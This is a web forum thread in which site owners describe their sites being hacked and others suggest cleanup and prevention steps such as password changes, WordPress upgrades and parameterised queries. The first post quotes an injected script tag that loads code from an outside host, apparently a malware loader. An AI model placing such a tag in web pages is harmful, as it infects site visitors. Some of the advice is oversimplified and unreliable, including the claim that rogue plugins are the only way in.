someone hacked my site

16 years ago

Originally Posted by Jeremy123

someone hacked my site, now in the Google results, it says,
this site may harm your computer

In the source code I found

<script src='http://b.adserv.cn/E/J.JS'>

I didn't close the script because I don't want to infect the WF

How do I get rid of this.

Well, the simple answer is that you need to edit the page source.
But you also need to:

Get ALL your passwords changed.
Check for the existence of new admin level accounts on your web server, domain account, email accounts/servers

Check your database backups
Get your web host to make sure their security patches are up to date on the server

And hopefully, find out how they got the script in there in the first place.

Thanks

Signature

Roger Willcocks
L-Space Design
Please vote to help me win a 3kW solar array

{{ DiscussionBoard.errors[55583].message }}

rwil02

16 years ago

Send me your domain name and I'll see what I can figure out from here

Thanks
1 reply

Signature

Roger Willcocks
L-Space Design
Please vote to help me win a 3kW solar array

{{ DiscussionBoard.errors[55585].message }}

Jeremy123

16 years ago

I found the script in the page source but not
on my computer so I republished all my pages
and over wrote the remote site.

I'm signed-up with Google webmaster tools, and Google
found this infection, I asked them to review my site last night,
this morning they said the site is clean and will remove
the warning from my search engine listing. hooray

Google is still reviewing the 2nd site that this happened to,
I expect the same positive results

the 3rd site it happened to was a site using wordpress,
wasn't sure where to find the code or how to republish
and over write, so I just took it down, it was very new only
a few pages, so no big deal

Thanks
1 reply

{{ DiscussionBoard.errors[56173].message }}

rwil02

16 years ago

Sounds like you've got it sorted then.
If the Wordpress site had the script on every page, it was probably the theme page the was hacked.
I think that is page.php in each of the themes folders.

You still need to do the other checks though, as you risk having someone come in and do it again in a few days, and if you're like most people, if they can get your password, they can probably get your email and your paypal account :}

Thanks
1 reply

Signature

Roger Willcocks
L-Space Design
Please vote to help me win a 3kW solar array

{{ DiscussionBoard.errors[57383].message }}

Eric Graudins

16 years ago

I've just had the same thing happen on a site that just has wordpress - v.2.5
Blocked by google, etc.

Pretty well every htm, html, and php file on the site had this script command added just before the < / body > tag

Can't find out much info on the net about it - other than this posting here at WF.
Will flick it up to the tech people to see what they can discover.

Thanks
1 reply

Signature

The biggest benefit of the internet is that almost everything can be automated.
The biggest curse of the internet is that almost everything can be automated.

{{ DiscussionBoard.errors[61581].message }}

nlquyen

13 years ago

Originally Posted by Eric Graudins

I've just had the same thing happen on a site that just has wordpress - v.2.5
Blocked by google, etc.

Pretty well every htm, html, and php file on the site had this script command added just before the < / body > tag

Can't find out much info on the net about it - other than this posting here at WF.
Will flick it up to the tech people to see what they can discover.

Yeb, i have also the same problem but don't have any solution for this.

Thanks
1 reply

{{ DiscussionBoard.errors[3941287].message }}

hhunt 13 years ago

Originally Posted by nlquyen

Yeb, i have also the same problem but don't have any solution for this.

You should check the plugins that are installed. The only way your site can be hacked is through rogue plugins. Check log files for unusual traffic and block them if possible.

That said, there's no one solution to hacked websites - it is entirely up to you how you protect your site.

Good luck.
- Thanks
Signature
VOIP Headphones | PC Repair | Swiss Gear Laptop Backpack Driving Test
{{ DiscussionBoard.errors[3943188].message }}

woah316

16 years ago

i wonder are there precations or scripts one can run to help prevent site hacking? or is it all on the hosting?

Thanks
1 reply

{{ DiscussionBoard.errors[61686].message }}

dynamics

16 years ago

Originally Posted by jusumax

i wonder are there precations or scripts one can run to help prevent site hacking? or is it all on the hosting?

It's both really - but mainly the server (hosting)
If the sever is not secure, then all sorts of exploits can be injected into any site on the server.
If the password for your account is simple (like john123 for example - I've had users use a password like that believe it or not), then a brute force password script will get eventually get access.
The server should have brute force protection running, so if there are say 5 failed login attempts, the IP of the 'hacker' is automatically blocked for a certain amount of time. The server admin would be advised of this and should take action.

I would be asking your host to sort out their server security.

Cheers
Brad

Thanks
1 reply

{{ DiscussionBoard.errors[63171].message }}

dburk

16 years ago

Great advice Brad,

You should also look closely at your own PC because keystroke loggers are rampant. They will steal your account credentials and send it to hackers.

You need to find out how your site was compromised or you will see a repeat.

Thanks
1 reply

Signature

* Get Results - Outsource Your PPC Management |
* Don Burk Advertising & Marketing - www.donburk.com

{{ DiscussionBoard.errors[63262].message }}

jiho

16 years ago

I've just had the exact same problem and it seems to be SQL injection attacks from the URL, I also found these 2 sites that were of help to me
How to find + stop SQL injection attacks : SQLCleanup.com
Helicon Tech: prevent SQL Injection hacks

I've only just set this up but I'm hoping it will prevent future attacks as this is the second time it has happened. The first time I didn't have a clue how they got access to the DB I just deleted the script and enabled web logging so we could monitor for next time. It happened again within a week and it looks like an attack via the URL as the guy in that forum is having, I definitely have very similar text in my logs.

Thanks
1 reply

{{ DiscussionBoard.errors[65574].message }}

rwil02

16 years ago

Originally Posted by jiho

I've just had the exact same problem and it seems to be SQL injection attacks from the URL, I also found these 2 sites that were of help to me
How to find + stop SQL injection attacks : SQLCleanup.com
Helicon Tech: prevent SQL Injection hacks

I've only just set this up but I'm hoping it will prevent future attacks as this is the second time it has happened. The first time I didn't have a clue how they got access to the DB I just deleted the script and enabled web logging so we could monitor for next time. It happened again within a week and it looks like an attack via the URL as the guy in that forum is having, I definitely have very similar text in my logs.

And THAT is why stored procedures are good.
Or more accurately, why parameterised queries are good.

And why the ASP.NET "ValidateRequest" event handler is soooo useful.

Thanks

Signature

Roger Willcocks
L-Space Design
Please vote to help me win a 3kW solar array

{{ DiscussionBoard.errors[65743].message }}

charles123krik

13 years ago

Good topic,My view on this topic.Ok this is simple you can edit your home page and make your website secure.Because any other program can not hack your website.You can also change the password and you must start session for your website.

Thanks

{{ DiscussionBoard.errors[3942539].message }}

altan

13 years ago

well you may have to check all authoritative rights are staying with you...you may also need to change your web hosting company.

Thanks

{{ DiscussionBoard.errors[3949372].message }}

Heimdalx

13 years ago

its easy. first of all u must change your web script by finding that script and del it. easy

Thanks

{{ DiscussionBoard.errors[3950892].message }}

harry alvin

Banned 13 years ago

[DELETED]

{{ DiscussionBoard.errors[3968796].message }}

Karen Blundell 13 years ago

First of all, for the guy who has version 2.5 of WordPress: upgrade to the latest version of WordPress! there's a reason WordPress updates are frequent and that is mostly for security reasons.

2nd thing: this is for WordPress sites: install the plugin called "Secure WordPress" that will prevent anyone from being able to hack into your WordPress plugin directory

If it's a non-WordPress site: place a blank index.html file in every directory except for your root directory (otherwise you'll overwrite your real home page)

that way no one can snoop into any of your directories.
- Thanks
Signature
---------------
{{ DiscussionBoard.errors[3969783].message }}

poweraff

13 years ago

Hello,

WordPress is famous with th Exploits,
Make sure to use the latest version and always make sure to upgrade as soon as possible once you get a new version release notification
most of times WordPress release new versions because the current version is infected with a exploit

Thank

Thanks

Signature

{{ DiscussionBoard.errors[3969964].message }}

adkarfa

13 years ago

what do u do to prevent it? Do u take any action?

Thanks
1 reply

Signature

Can't Sleep at night, try Dr Larry better sleep tonight.

{{ DiscussionBoard.errors[3975947].message }}

awebforyou 13 years ago

It is a common sql injection error
If it's wordpress then you need to upgrade

If it's a different application then you need to fix the code to protect the database from sql injection issues.

If you need help feel free to PM me.

Esther
web programmer-eshops-custom database solutions-Awebforyou
- Thanks
- 1 reply
{{ DiscussionBoard.errors[3976499].message }}
- qayim123 13 years ago
  
  Hack This Site is a free, safe and legal training ground for hackers to test ... they can submit, "X is broken, here is my patch." Also, once in the Beta
  
  Thanks
  
  1 reply
  
  {{ DiscussionBoard.errors[3977934].message }}
  
  thewanderer 13 years ago
  
  FYI - This thread started back in 2008 and was re-awoken so WordPress 2.5 was probably current at the time.
  
  Its a good topic anyway, WordPress is very popular and can be made secure as long as a few things are kept in mind, such as:
  
  Back It Up - Be ready to lose it all at anytime. If you have an up to date backup restoring is much easier.
  
  Keep WordPress System up to date
  
  Keep all Plugins up to date
  
  Beware of untrusted Themes
  
  Rename admin account to a non-generic name
  
  Use strong passwords ( a dictionary word with a number after it is not a strong password! )
  
  Keep your password safe! Do not re-use it on other sites.
  
  Ensure you have up to date AV on your Windows Machine. Malware collects passwords.
  
  The underlying server must be well managed and in a secure state
  
  VPS or Dedicated server? Set up server monitoring (ossec is a good start)
  
  This list is from a recent Blog post I did (sorry no link). However there are many such guides on the web.
  
  Did you know WordPress runs about 15% of the top 1 million sites?
  
  Thanks
  
  {{ DiscussionBoard.errors[3981535].message }}

Zelthcon

13 years ago

Also find out how exactly you got hacked so you can patch the issue so it doesnt happen again

.

Thanks

{{ DiscussionBoard.errors[3986353].message }}

someone hacked my site

Trending Topics

Been a while! Any of you Old Timers here?

How much does the rebranding affect CR ?

Are billboards still effective in driving customers?

Boat and Jet Ski Rentals...... Door Hangers Effective?

Clickbank low cost recurring